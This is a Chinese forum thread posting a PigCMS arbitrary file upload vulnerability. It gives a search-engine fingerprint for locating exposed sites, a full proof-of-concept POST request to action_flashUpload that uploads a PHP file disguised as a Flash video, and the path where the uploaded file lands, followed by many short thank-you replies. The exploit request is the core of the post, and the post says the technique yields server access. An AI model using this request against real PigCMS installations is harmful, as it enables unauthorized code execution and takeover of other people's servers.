anyue1937 发表于 2025-10-15 20:07:52

PigCMS action_flashUpload 任意文件上传漏洞

## 漏洞描述
PigCMS action_flashUpload 方法中存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取到服务器权限
## 漏洞影响
pigcms
## 网络测绘
```app.name="PigCMS"```
## 漏洞复现
登陆页面
!(images/image-2050828161452591.png)
验证POC
```POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host:Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----aaa
------aaaContent-Disposition: form-data; name="filePath"; filename="test.php"Content-Type: video/x-flv
<?php phpinfo();?>------aaa```
!(images/image-20230828161506565.png)
```/cms/upload/images/2025/08/11/1691722887xXbx.php```

映各 发表于 2025-10-31 03:02:59

感谢分享,学习下。

喳谍 发表于 2025-11-25 20:37:34

懂技术并乐意极积无私分享的人越来越少。珍惜

荆邦 发表于 2025-12-25 16:29:51

收藏一下   不知道什么时候能用到

计海龄 发表于 2026-1-2 17:59:53

用心讨论,共获提升!

驶桐柢 发表于 2026-1-4 17:15:38

谢谢分享,试用一下

抑卞枯 发表于 2026-1-5 16:11:08

感谢分享,学习下。

骆贵 发表于 2026-1-14 07:55:01

新版吗?好像是停更了吧。

轮达 发表于 2026-1-15 21:49:11

很好很强大我过来先占个楼 待编辑

党新苗 发表于 2026-1-18 08:05:50

这个好,看起来很实用

瞿佳悦 发表于 2026-1-18 21:11:35

谢谢分享,辛苦了

客臂渐 发表于 2026-1-18 23:49:04

新版吗?好像是停更了吧。

钿稳铆 发表于 2026-1-20 14:32:36

东西不错很实用谢谢分享

魁睥 发表于 2026-1-20 20:54:15

谢谢分享,辛苦了

跑两獗 发表于 2026-1-21 18:47:28

感谢分享,下载保存了,貌似很强大

凤患更 发表于 2026-1-22 13:33:13

谢谢分享,试用一下

劳暄美 发表于 2026-1-23 07:50:50

过来提前占个楼

辖瑁地 发表于 2026-1-23 08:30:44

喜欢鼓捣这些软件,现在用得少,谢谢分享!

仰翡邸 发表于 2026-1-23 09:29:53

分享、互助 让互联网精神温暖你我

笙芝 发表于 2026-1-27 18:07:36

很好很强大我过来先占个楼 待编辑
页: [1] 2
查看完整版本: PigCMS action_flashUpload 任意文件上传漏洞